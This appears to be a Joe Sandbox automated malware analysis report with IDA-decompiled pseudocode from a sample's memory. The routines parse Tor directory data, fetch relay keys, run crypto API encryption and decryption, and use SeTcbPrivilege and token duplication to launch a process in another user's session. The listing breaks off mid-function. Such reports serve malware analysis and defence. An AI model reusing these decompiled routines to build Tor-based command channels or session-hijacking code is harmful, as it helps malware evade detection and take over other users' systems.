    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E2403, Relevance: 1.5, APIs: 1, Instructions: 11
    C-Code - Quality: 37%
    			E003E2403() {
				intOrPtr _t1;
				WCHAR* _t2;

				_t1 =  *0x3e8980; // 0x0
				_push(0x3e8654);
				_push( *0x3e897c);
				 *0x3e8654 = _t1;
				_push(0x3e8644);
				_push(0x3e8648);
				_push(0x3e8640); // executed
				_t2 = GetEnvironmentStringsW(); // executed
				 *0x3e8650 = _t2;
				return _t2;
			}





    0x003e2403
    0x003e2408
    0x003e240d
    0x003e2413
    0x003e2418
    0x003e241d
    0x003e2422
    0x003e2427
    0x003e2430
    0x003e2435

    APIs
    • GetEnvironmentStringsW.KERNELBASE ref: 003E2427
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Non-executed Functions

    Function 003D528D, Relevance: 43.8, APIs: 19, Strings: 10, Instructions: 271string
    C-Code - Quality: 59%
    			E003D528D(intOrPtr _a4, signed int* _a8, char* _a12) {
				signed int _v8;
				void* _v12;
				char* _v16;
				char* _v20;
				void** _v24;
				signed int _v28;
				char* _v32;
				void* _v36;
				char _v52;
				char* _t73;
				char* _t74;
				char* _t75;
				void* _t76;
				signed int _t78;
				void* _t79;
				void* _t84;
				char* _t87;
				char* _t91;
				char* _t94;
				int _t96;
				int _t101;
				intOrPtr _t102;
				void* _t103;
				unsigned int _t104;
				void* _t108;
				void* _t113;
				char* _t122;
				char* _t124;
				void* _t125;
				void* _t136;
				char* _t139;
				signed int _t140;
				signed int* _t141;
				void* _t143;
				intOrPtr _t150;
				void* _t158;
				void* _t159;
				signed int _t161;
				void _t173;
				void _t174;
				int _t175;
				void* _t176;
				signed int _t178;
				intOrPtr* _t179;
				void* _t183;
				intOrPtr _t190;
				intOrPtr* _t191;
				char* _t192;
				void* _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t198;
				void* _t199;

				_t73 = strstr(_a12, "protocol-versions 2,3");
				_pop(_t143);
				if(_t73 != 0) {
					_t74 = strstr(_a12, "-----BEGIN MESSAGE-----\n");
					_t75 = strstr(_a12, "\n-----END MESSAGE-----");
					_t196 = _t195 + 0x10;
					_t136 =  &(_t74[0x18]);
					if(_t136 == 0 || _t75 == 0) {
						L35:
						_t76 = 0;
						goto L36;
					} else {
						_t175 = _t75 - _t136;
						if(_t175 <= 0) {
							goto L35;
						}
						_t4 = _t175 + 1; // 0x1
						_t78 = _t4;
						_v28 = _t78;
						_t79 =  *0x3e8538(_t78);
						_v36 = _t79;
						memcpy(_t79, _t136, _t175);
						 *((char*)(_v36 + _t175)) = 0;
						_t176 =  *0x3e8538(_v28);
						_v32 = _t176;
						memset(_t176, 0, _v28);
						_t84 = E003D3933(_v28, _t143, _v36, _t176);
						_t197 = _t196 + 0x28;
						if(_t84 == 0) {
							L34:
							 *0x3e8540(_v32);
							 *0x3e8540(_v36);
							goto L35;
						}
						_v8 = _v8 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						_t139 = "-----BEGIN RSA PUBLIC KEY-----";
						_t87 = strstr(_t176 + 1, _t139);
						if(_t87 == 0) {
							L27:
							_t190 = _a4;
							L28:
							if(_v8 <= 0) {
								L31:
								_t178 = _v28;
								if(_t178 <= 0) {
									goto L34;
								}
								_t191 = _t190 + 0x1c;
								do {
									 *0x3e8540( *_t191);
									_t191 = _t191 + 0x20;
									_t178 = _t178 - 1;
								} while (_t178 != 0);
								goto L34;
							}
							_t140 = _v8;
							_t179 = _t190 + 0x18;
							do {
								 *0x3e8540( *_t179);
								_t179 = _t179 + 0x20;
								_t140 = _t140 - 1;
							} while (_t140 != 0);
							goto L31;
						}
						_t150 = _a4;
						_v24 = _t150 + 0x1c;
						_v20 = _t150 + 0x18;
						while(1) {
							_v12 = _t87;
							_t91 = strstr( &(_t87[1]), "-----END RSA PUBLIC KEY-----");
							_v16 = _t91;
							if(_t91 == 0) {
								break;
							}
							_t113 =  *0x3e8538(0x1000);
							 *_v20 = _t113;
							memset(_t113, 0, 0x1000);
							memcpy( *_v20, _v12, _v16 - _v12 + 0x1c);
							_v8 = _v8 + 1;
							_v20 =  &(_v20[0x20]);
							_t122 = strstr( &(_v16[1]), _t139);
							_t197 = _t197 + 0x24;
							if(_t122 == 0) {
								break;
							}
							_v12 = _t122;
							_t124 = strstr( &(_t122[1]), "-----END RSA PUBLIC KEY-----");
							_v16 = _t124;
							if(_t124 == 0) {
								break;
							}
							_t125 =  *0x3e8538(0x1000);
							 *_v24 = _t125;
							memset(_t125, 0, 0x1000);
							memcpy( *_v24, _v12, _v16 - _v12 + 0x1c);
							_v28 = _v28 + 1;
							_v24 =  &(_v24[8]);
							_t87 = strstr( &(_v16[1]), _t139);
							_t197 = _t197 + 0x24;
							if(_t87 != 0) {
								continue;
							}
							break;
						}
						if(_v8 != _v28 || _v8 == 0) {
							goto L27;
						} else {
							_t141 = _a8;
							 *_t141 =  *_t141 & 0x00000000;
							_t192 = "\n";
							_v20 = strtok(_v32, _t192);
							_t94 = strtok(0, _t192);
							_t198 = _t197 + 0x10;
							while(1) {
								_v24 = _t94;
								if(_t94 == 0) {
									break;
								}
								_t96 = sscanf(_v24, "onion-port %5s",  &_v52);
								_t198 = _t198 + 0xc;
								if(_t96 != 1) {
									L23:
									_v20 = _v24;
									_t94 = strtok(0, _t192);
									continue;
								}
								_t190 = _a4;
								_t101 = sscanf(_v20, "ip-address %15s", ( *_t141 << 5) + _t190);
								_t199 = _t198 + 0xc;
								if(_t101 != 1) {
									goto L28;
								}
								_t158 = ( *_t141 << 5) + _t190;
								_t183 = _t158 - 1;
								do {
									_t102 =  *((intOrPtr*)(_t183 + 1));
									_t183 = _t183 + 1;
								} while (_t102 != 0);
								_t103 =  &_v52;
								asm("movsw");
								_t194 = _t103;
								do {
									_t173 =  *_t103;
									_t103 = _t103 + 1;
								} while (_t173 != 0);
								_t104 = _t103 - _t194;
								_t159 = _t158 - 1;
								do {
									_t174 =  *(_t159 + 1);
									_t159 = _t159 + 1;
								} while (_t174 != 0);
								_t161 = _t104 >> 2;
								_t108 = memcpy(_t194 + _t161 + _t161, _t194, memcpy(_t159, _t194, _t161 << 2) & 0x00000003);
								_t198 = _t199 + 0x18;
								 *_t141 = _t108;
								_t192 = "\n";
								goto L23;
							}
							if( *_t141 != _v8) {
								goto L27;
							}
							 *0x3e8540(_v32);
							 *0x3e8540(_v36);
							_t76 = 1;
							L36:
							return _t76;
						}
					}
				}
				return _t73;
			}

























































    0x003d52a3
    0x003d52a6
    0x003d52a9
    0x003d52b8
    0x003d52c4
    0x003d52c6
    0x003d52c9
    0x003d52cc
    0x003d5564
    0x003d5564
    0x00000000
    0x003d52da
    0x003d52dc
    0x003d52e0
    0x00000000
    0x00000000
    0x003d52e6
    0x003d52e6
    0x003d52ea
    0x003d52ed
    0x003d52f6
    0x003d52f9
    0x003d5304
    0x003d5311
    0x003d5316
    0x003d5319
    0x003d5323
    0x003d5328
    0x003d532d
    0x003d5550
    0x003d5553
    0x003d555c
    0x00000000
    0x003d5563
    0x003d5333
    0x003d5337
    0x003d533b
    0x003d5343
    0x003d5349
    0x003d5519
    0x003d5519
    0x003d551c
    0x003d5520
    0x003d5537
    0x003d5537
    0x003d553c
    0x00000000
    0x00000000
    0x003d553e
    0x003d5541
    0x003d5543
    0x003d5549
    0x003d554c
    0x003d554d
    0x00000000
    0x003d5541
    0x003d5522
    0x003d5525
    0x003d5528
    0x003d552a
    0x003d5530
    0x003d5533
    0x003d5534
    0x00000000
    0x003d5528
    0x003d534f
    0x003d5358
    0x003d535b
    0x003d5363
    0x003d5363
    0x003d536d
    0x003d5371
    0x003d5376
    0x00000000
    0x00000000
    0x003d537d
    0x003d538a
    0x003d538c
    0x003d53a3
    0x003d53ab
    0x003d53ae
    0x003d53b5
    0x003d53b7
    0x003d53bc
    0x00000000
    0x00000000
    0x003d53be
    0x003d53c8
    0x003d53cc
    0x003d53d1
    0x00000000
    0x00000000
    0x003d53d4
    0x003d53e1
    0x003d53e3
    0x003d53fa
    0x003d5402
    0x003d5405
    0x003d540c
    0x003d540e
    0x003d5413
    0x00000000
    0x00000000
    0x00000000
    0x003d5413
    0x003d541f
    0x00000000
    0x003d542f
    0x003d542f
    0x003d5438
    0x003d543b
    0x003d5449
    0x003d544c
    0x003d544e
    0x003d54ee
    0x003d54ee
    0x003d54f3
    0x00000000
    0x00000000
    0x003d5468
    0x003d546a
    0x003d5470
    0x003d54dd
    0x003d54e3
    0x003d54e6
    0x00000000
    0x003d54ed
    0x003d5474
    0x003d5485
    0x003d5487
    0x003d548d
    0x00000000
    0x00000000
    0x003d5498
    0x003d549a
    0x003d549d
    0x003d549d
    0x003d54a0
    0x003d54a1
    0x003d54aa
    0x003d54ad
    0x003d54af
    0x003d54b1
    0x003d54b1
    0x003d54b3
    0x003d54b4
    0x003d54b8
    0x003d54ba
    0x003d54bb
    0x003d54bb
    0x003d54be
    0x003d54bf
    0x003d54c7
    0x003d54d4
    0x003d54d4
    0x003d54d6
    0x003d54d8
    0x00000000
    0x003d54d8
    0x003d54fe
    0x00000000
    0x00000000
    0x003d5503
    0x003d550c
    0x003d5516
    0x003d5566
    0x00000000
    0x003d5566
    0x003d541f
    0x003d52cc
    0x003d556a

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DEF6B, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 140encryption
    C-Code - Quality: 23%
    			E003DEF6B(void* _a4, int _a8, void* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24) {
				long* _v8;
				void* _v12;
				long* _v16;
				int _v20;
				signed int _t42;
				void* _t48;
				int _t51;
				DWORD* _t67;
				BYTE* _t71;
				signed int _t78;
				char _t82;
				int _t84;
				void* _t90;

				_t78 = _a8;
				_t42 = _t78 & 0x8000000f;
				if(_t42 < 0) {
					_t90 = (_t42 - 0x00000001 | 0xfffffff0) + 1;
				}
				if(_t90 != 0) {
					L13:
					return 0;
				} else {
					_t82 = 0x10;
					if(_t78 < _t82) {
						goto L13;
					}
					_v16 = 0;
					if(CryptAcquireContextA( &_v16, 0, 0, 0x18, 0xf0000000) == 0) {
						goto L13;
					}
					_t48 =  *0x3e8538(_t78 + _t78);
					_v12 = _t48;
					_t71 =  *0x3e8538(0x1c);
					 *_t71 = 0x208;
					_t71[4] = 0x660e;
					_t71[8] = _t82;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t51 = CryptImportKey(_v16, _t71, 0x1c, 0, 0,  &_v8);
					if(_t51 == 0) {
						L12:
						CryptReleaseContext(_v16, 0);
						 *0x3e8540(_v12);
						 *0x3e8540(_t71);
						goto L13;
					}
					__imp__CryptSetKeyParam(_v8, 1, _a20, 0);
					if(_t51 == 0) {
						L11:
						CryptDestroyKey(_v8);
						goto L12;
					}
					_t84 = _a8;
					memcpy(_v12, _a4, _t84);
					_v20 = _t84;
					if(_a24 == 0) {
						if(CryptDecrypt(_v8, 0, 1, 0, _v12,  &_v20) != 0) {
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							memcpy(_a12, _v12, _a8);
							CryptDestroyKey(_v8);
							CryptReleaseContext(_v16, 0);
							 *0x3e8540(_v12);
							 *0x3e8540(_t71);
							return _v20;
						}
						goto L11;
					}
					_t67 =  &_v20;
					__imp__CryptEncrypt(_v8, 0, 1, 0, _v12, _t67, _t84 + _t84);
					if(_t67 == 0) {
						goto L11;
					}
					goto L16;
				}
			}
















    0x003def74
    0x003def79
    0x003def7e
    0x003def84
    0x003def84
    0x003def85
    0x003df08c
    0x00000000
    0x003def8b
    0x003def8d
    0x003def90
    0x00000000
    0x00000000
    0x003defa1
    0x003defb0
    0x00000000
    0x00000000
    0x003defba
    0x003defc2
    0x003defcb
    0x003defcd
    0x003defd3
    0x003defda
    0x003defe3
    0x003defe4
    0x003defe6
    0x003defe8
    0x003deff7
    0x003defff
    0x003df070
    0x003df074
    0x003df07d
    0x003df084
    0x00000000
    0x003df08b
    0x003df00a
    0x003df012
    0x003df067
    0x003df06a
    0x00000000
    0x003df06a
    0x003df014
    0x003df01e
    0x003df026
    0x003df02c
    0x003df065
    0x003df096
    0x003df0a3
    0x003df0a7
    0x003df0a8
    0x003df0a9
    0x003df0aa
    0x003df0b5
    0x003df0c0
    0x003df0c9
    0x003df0d0
    0x00000000
    0x003df0da
    0x00000000
    0x003df065
    0x003df032
    0x003df040
    0x003df048
    0x00000000
    0x00000000
    0x00000000
    0x003df04a

    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003DEFA8
    • CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003DEFF7
    • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003DF00A
    • memcpy.MSVCRT ref: 003DF01E
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003DF040
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003DF05D
    • CryptDestroyKey.ADVAPI32(?), ref: 003DF06A
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF074
    • memcpy.MSVCRT ref: 003DF0AA
    • CryptDestroyKey.ADVAPI32(?), ref: 003DF0B5
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF0C0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D556B, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 114string
    C-Code - Quality: 46%
    			E003D556B(void* __ecx, void* __edi, void* __eflags) {
				char* _v8;
				void* _v12;
				void* _v16;
				char _v20;
				intOrPtr _v32;
				char _v36;
				char _v860;
				void* __ebx;
				void* __esi;
				void* _t28;
				char _t31;
				void* _t33;
				char _t40;
				char* _t41;
				char* _t48;
				void* _t51;
				void* _t62;
				char* _t79;
				void* _t86;

				_t86 = __eflags;
				_t28 = E003D3E45(__ecx);
				E003D3E17( &_v860);
				_t31 = L003DF529(_t86, _t28);
				_pop(_t62);
				_v860 = _t31;
				_t87 = _t31;
				if(_t31 == 0) {
					L8:
					return 0;
				}
				_t33 = E003D4054( &_v860, _t87);
				_t88 = _t33;
				if(_t33 == 0 || E003D3EE9( &_v860, _t62, _t88) == 0) {
					L7:
					E003DFF10(_v860);
					goto L8;
				} else {
					_v20 = 0x10;
					__imp__#5( *_v860,  &_v36,  &_v20);
					_t40 =  *0x3e8538(0x200);
					_v12 = _t40;
					_t41 =  *0x3e8538(0x1000);
					_v8 = _t41;
					__imp__#12(_v32);
					_t12 =  &_v12; // 0x3d5e6d
					sprintf( *_t12, "GET /tor/micro/d/%s.z HTTP/1.0\r\nHost: %s\r\n\r\n", __edi + 0x2c, _t41);
					if(E003D4BDF( &_v860, _v12, _v8, 0) == 0) {
						L6:
						 *0x3e8540(_v8);
						 *0x3e8540(_v12);
						goto L7;
					}
					_t48 = strstr(_v8, "-----BEGIN RSA PUBLIC KEY-----");
					_v16 = _t48;
					if(_t48 == 0) {
						goto L6;
					}
					_t79 =  &((strstr( &(_t48[1]), "-----END RSA PUBLIC KEY-----"))[0x1c]);
					if(_t79 != 0) {
						_t51 =  *0x3e8538(0x1000);
						 *(__edi + 0x6c) = _t51;
						memset(_t51, 0, 0x1000);
						memcpy( *(__edi + 0x6c), _v16, _t79 - _v16);
						 *0x3e8540(_v8);
						 *0x3e8540(_v12);
						E003DFF10(_v860);
						__eflags = 1;
						return 1;
					}
					goto L6;
				}
			}






















    0x003d556b
    0x003d5576
    0x003d5583
    0x003d5589
    0x003d558e
    0x003d558f
    0x003d5595
    0x003d5597
    0x003d567c
    0x00000000
    0x003d567c
    0x003d55a3
    0x003d55a8
    0x003d55aa
    0x003d5671
    0x003d5677
    0x00000000
    0x003d55bf
    0x003d55cd
    0x003d55d6
    0x003d55e1
    0x003d55ee
    0x003d55f1
    0x003d55fb
    0x003d55fe
    0x003d560e
    0x003d5611
    0x003d5630
    0x003d565d
    0x003d5660
    0x003d566a
    0x00000000
    0x003d5670
    0x003d5640
    0x003d5644
    0x003d5649
    0x00000000
    0x00000000
    0x003d5656
    0x003d565b
    0x003d5681
    0x003d568c
    0x003d568f
    0x003d56a1
    0x003d56ac
    0x003d56b6
    0x003d56c3
    0x003d56ca
    0x00000000
    0x003d56ca
    0x00000000
    0x003d565b

    APIs
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D40B3
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4122
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4165
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D41AC
      • Part of subcall function 003D4054: htonl.WS2_32(00000000), ref: 003D41C5
      • Part of subcall function 003D4054: getpeername.WS2_32(?,?,?), ref: 003D41EA
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D4226
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4233
    • getpeername.WS2_32(?,?,?), ref: 003D55D6
    • inet_ntoa.WS2_32(?), ref: 003D55FE
    • sprintf.MSVCRT ref: 003D5611
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4C2D
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C61
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C80
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C90
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4CA5
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D4B
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D68
      • Part of subcall function 003D4BDF: sscanf.MSVCRT ref: 003D4D70
    • strstr.MSVCRT ref: 003D5640
    • strstr.MSVCRT ref: 003D5652
      • Part of subcall function 003DFF10: closesocket.WS2_32(?), ref: 003DFF12
    • memset.MSVCRT ref: 003D568F
    • memcpy.MSVCRT ref: 003D56A1
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F19
      • Part of subcall function 003D3EE9: htons.WS2_32(00000000), ref: 003D3F31
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F7B
      • Part of subcall function 003D3EE9: htons.WS2_32(?), ref: 003D3FB2
    Strings
    • -----BEGIN RSA PUBLIC KEY-----, xrefs: 003D5638
    • -----END RSA PUBLIC KEY-----, xrefs: 003D564C
    • GET /tor/micro/d/%s.z HTTP/1.0Host: %s, xrefs: 003D5609
    • m^=, xrefs: 003D560E
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CC320, Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 381library
    C-Code - Quality: 69%
    			E003CC320(intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v12;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _v36;
				short _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr* _v68;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				intOrPtr* _v84;
				char* _v88;
				intOrPtr* _v92;
				char _v96;
				intOrPtr _v100;
				char _v108;
				char _v112;
				char _v128;
				char _v228;
				short _v248;
				char* _v288;
				char _v296;
				char _v496;
				char _v1008;
				void* _v1520;
				intOrPtr _t122;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				intOrPtr* _t128;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t131;
				intOrPtr _t141;
				intOrPtr* _t146;
				intOrPtr _t147;
				intOrPtr* _t148;
				intOrPtr _t149;
				intOrPtr* _t152;
				intOrPtr* _t154;
				intOrPtr _t157;
				intOrPtr* _t158;
				intOrPtr _t165;
				intOrPtr* _t166;
				intOrPtr* _t170;
				long _t172;
				intOrPtr* _t175;
				signed int _t176;
				intOrPtr* _t177;
				intOrPtr* _t181;
				_Unknown_base(*)()* _t199;
				intOrPtr _t201;
				intOrPtr _t205;
				intOrPtr _t207;
				intOrPtr _t211;
				intOrPtr _t213;
				char* _t214;
				intOrPtr* _t226;
				intOrPtr _t236;
				intOrPtr _t237;
				intOrPtr _t239;
				intOrPtr _t251;
				intOrPtr _t256;
				intOrPtr* _t259;
				intOrPtr _t260;
				intOrPtr _t262;
				intOrPtr _t263;
				intOrPtr _t267;
				signed int _t269;
				signed int _t270;
				intOrPtr* _t271;
				struct HINSTANCE__* _t272;
				void* _t273;
				void* _t275;
				_Unknown_base(*)()* _t279;

				_t201 =  *0x3e8628; // 0x622508
				_v8 = 0;
				_v20 = 0;
				_v24 = 0xffffffff;
				_v28 = 0;
				_v36 = 0;
				_v16 = 0;
				_v296 = 0x44;
				_v40 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xb8))))( &_v296);
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_t279 =  *0x3e85c8; // 0x0
				if(_t279 != 0) {
					L4:
					_t122 =  *0x3e8628; // 0x622508
					_v44 = 0;
					_t29 = _t122 + 0x150; // 0x622658
					_t269 = _t29;
					_t125 =  *((intOrPtr*)( *_t269))( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x100))))(0x28,  &_v16));
					__eflags = _t125;
					if(_t125 != 0) {
						_t260 =  *0x3e8628; // 0x622508
						_t181 =  *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x188))))(0, L"SeTcbPrivilege",  &_v108);
						__eflags = _t181;
						if(_t181 != 0) {
							_t262 =  *0x3e8628; // 0x622508
							_v112 = 1;
							_v100 = 2;
							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x18c))))(_v16, 0,  &_v112, 0x10,  &_v128,  &_v44);
						}
					}
					_t126 =  *0x3e85dc; // 0x0
					_t270 = _t269 | 0xffffffff;
					__eflags = _t126;
					if(_t126 == 0) {
						L18:
						_t127 =  *0x3e85fc; // 0x0
						__eflags = _t127;
						if(_t127 == 0) {
							goto L31;
						} else {
							_t270 =  *_t127();
							__eflags = _t270 - 0xffffffff;
							if(_t270 == 0xffffffff) {
								goto L31;
							} else {
								goto L20;
							}
						}
					} else {
						_t175 =  *_t126(0, 0, 1,  &_v28,  &_v36);
						__eflags = _t175;
						if(_t175 == 0) {
							goto L18;
						} else {
							_t259 = _v36;
							_t267 = _v28;
							_t176 = 0;
							__eflags = _t259;
							if(_t259 > 0) {
								_t226 = _t267 + 8;
								while(1) {
									__eflags =  *_t226;
									if( *_t226 == 0) {
										_t270 =  *(_t267 + (_t176 + _t176 * 2) * 4);
										goto L15;
									}
									_t176 = _t176 + 1;
									_t226 = _t226 + 0xc;
									__eflags = _t176 - _t259;
									if(_t176 < _t259) {
										continue;
									} else {
									}
									goto L15;
								}
							}
							L15:
							_t177 =  *0x3e85f8; // 0x0
							__eflags = _t177;
							if(_t177 != 0) {
								 *_t177(_t267);
							}
							__eflags = _t270 - 0xffffffff;
							if(_t270 != 0xffffffff) {
								L20:
								_t207 =  *0x3e8628; // 0x622508
								 *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x190))))();
								_t146 =  *0x3e85c8(_t270,  &_v24);
								__eflags = _t146;
								if(_t146 == 0) {
									L31:
									_t271 = _v48;
								} else {
									_t147 =  *0x3e8628; // 0x622508
									_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x144))))(_v24, 0x2000000, 0, 1, 1,  &_v8);
									__eflags = _t148;
									if(_t148 == 0) {
										goto L31;
									} else {
										_t149 =  *0x3e8628; // 0x622508
										 *((intOrPtr*)( *((intOrPtr*)(_t149 + 0xf8))))(_v24);
										_t211 =  *0x3e8628; // 0x622508
										_v12 = 0;
										_t271 = 0;
										_t152 =  *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x13c))))(_v8, 1, 0, 0,  &_v12);
										__eflags = _t152;
										if(_t152 != 0) {
											L25:
											_t213 =  *0x3e8628; // 0x622508
											_t154 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x13c))))(_v8, 1, _t271, _v12,  &_v12);
											__eflags = _t154;
											if(_t154 != 0) {
												_t214 =  &_v32;
												_t157 =  *0x3e8628; // 0x622508
												_v32 = 0x100;
												_v1008 = 0;
												_v1520 = 0;
												_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x140))))(0,  *_t271,  &_v1008, _t214,  &_v1520, _t214,  &_v48);
												__eflags = _t158;
												if(_t158 != 0) {
													_v96 = 0;
													_v88 = 0;
													_v92 = 0;
													_v84 = 0;
													_v80 = 0;
													_v76 = 0;
													_v72 = 0;
													_v68 = 0;
													_v88 =  &_v1008;
													_t251 =  *0x3e8628; // 0x622508
													_v96 = 0x20;
													_t85 = _t251 + 0x200; // 0x75501aac
													__eflags =  *((intOrPtr*)( *_t85))(_v8,  &_v96);
													if(__eflags != 0) {
														_v248 = 0;
														E003C9090(__eflags,  &_v496, 0x9c);
														_t273 = _t273 + 8;
														_v288 =  &_v496;
														_t165 =  *0x3e8628; // 0x622508
														_t91 = _t165 + 0x1f8; // 0x75501a7a
														_t166 =  *((intOrPtr*)( *_t91))( &_v20, _v8, 0);
														__eflags = _t166;
														if(_t166 != 0) {
															_t256 =  *0x3e8628; // 0x622508
															_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x148))))(_v8, 0, _a12, 0, 0, 0, _a16, _v20, 0,  &_v296,  &_v64);
															__eflags = _t170;
															if(_t170 != 0) {
																 *_a4 = _v64;
																 *_a8 = _v60;
																_v40 = 1;
															}
														}
													}
												}
											}
										} else {
											_t172 = GetLastError();
											__eflags = _t172 - 0x7a;
											if(_t172 == 0x7a) {
												_t271 = E003D1D90(_v12, 0);
												_t273 = _t273 + 8;
												__eflags = _t271;
												if(_t271 != 0) {
													goto L25;
												}
											}
										}
									}
								}
							} else {
								goto L18;
							}
						}
					}
					_t128 = _v68;
					__eflags = _t128;
					if(_t128 != 0) {
						_t141 =  *0x3e8628; // 0x622508
						_t108 = _t141 + 0x204; // 0x75503e6f
						 *((intOrPtr*)( *_t108))(_v8, _t128);
					}
					_t129 = _v8;
					__eflags = _t129;
					if(_t129 != 0) {
						_t239 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t239 + 0xf8))))(_t129);
					}
					_t130 = _v20;
					__eflags = _t130;
					if(_t130 != 0) {
						_t205 =  *0x3e8628; // 0x622508
						_t112 = _t205 + 0x1fc; // 0x75501a4e
						 *((intOrPtr*)( *_t112))(_t130);
					}
					__eflags = _t271;
					if(_t271 != 0) {
						E003CBB40(_t271);
					}
					_t131 = _v16;
					__eflags = _t131;
					if(_t131 != 0) {
						_t236 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x18c))))(_t131, 0,  &_v128, 0x10, 0, 0);
						_t237 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t237 + 0xf8))))(_v16);
					}
					return _v40;
				} else {
					E003C6CB0( &_v228, 0x97);
					_t263 =  *0x3e8628; // 0x622508
					_t275 = _t273 + 8;
					_t272 =  *((intOrPtr*)( *((intOrPtr*)(_t263 + 0x48))))( &_v228);
					if(_t272 == 0) {
						L3:
						return 0;
					} else {
						E003C6CB0( &_v228, 0x98);
						 *0x3e85dc = GetProcAddress(_t272,  &_v228);
						E003C6CB0( &_v228, 0x99);
						 *0x3e85f8 = GetProcAddress(_t272,  &_v228);
						E003C6CB0( &_v228, 0x9a);
						 *0x3e85fc = GetProcAddress(_t272,  &_v228);
